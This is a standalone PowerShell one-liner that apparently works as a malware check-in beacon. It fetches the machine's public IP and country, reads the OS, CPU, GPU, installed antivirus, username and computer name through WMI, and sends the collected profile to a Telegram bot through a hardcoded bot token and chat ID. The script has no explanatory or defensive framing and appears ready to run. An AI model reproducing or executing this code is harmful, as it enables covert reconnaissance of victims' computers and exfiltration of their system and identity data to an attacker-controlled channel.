powershell -Command "
$TOKEN = '7615353876:AAF-Mcj1DDxs85m-pU4fAIR34jJ1r8y7p54';
$CHAT_ID = '5674938532';
$ipInfo = Invoke-RestMethod 'http://ip-api.com/csv/?fields=country,query' -UseBasicParsing;
$country, $ip = $ipInfo -split ',';
$windows = (Get-WmiObject -Query 'SELECT Caption FROM Win32_OperatingSystem').Caption;
$cpu = (Get-WmiObject -Query 'SELECT Name FROM Win32_Processor').Name;
$gpu = (Get-WmiObject -Query 'SELECT Caption FROM Win32_VideoController').Caption;
$antivirus = (Get-WmiObject -Namespace 'root\SecurityCenter2' -Query 'SELECT displayName FROM AntiVirusProduct').displayName;
$arch = if (Test-Path Env:ProgramFiles(x86)) {'X64'} else {'X86'};
$username = $env:USERNAME;
$worker = $env:COMPUTERNAME;
$message = '---RUSVKVZ---' + [System.Environment]::NewLine + 'IP: ' + $ip + [System.Environment]::NewLine + 'Country: ' + $country + [System.Environment]::NewLine + 'Worker: ' + $worker + [System.Environment]::NewLine + 'UserName: ' + $username + [System.Environment]::NewLine + 'Windows: ' + $windows + ' ' + $arch + [System.Environment]::NewLine + 'CPU: ' + $cpu + [System.Environment]::NewLine + 'GPU: ' + $gpu + [System.Environment]::NewLine + 'Antivirus: ' + $antivirus;
Invoke-RestMethod "https://api.telegram.org/bot$TOKEN/sendMessage" -Method POST -Body @{chat_id=$CHAT_ID; text=$message}"
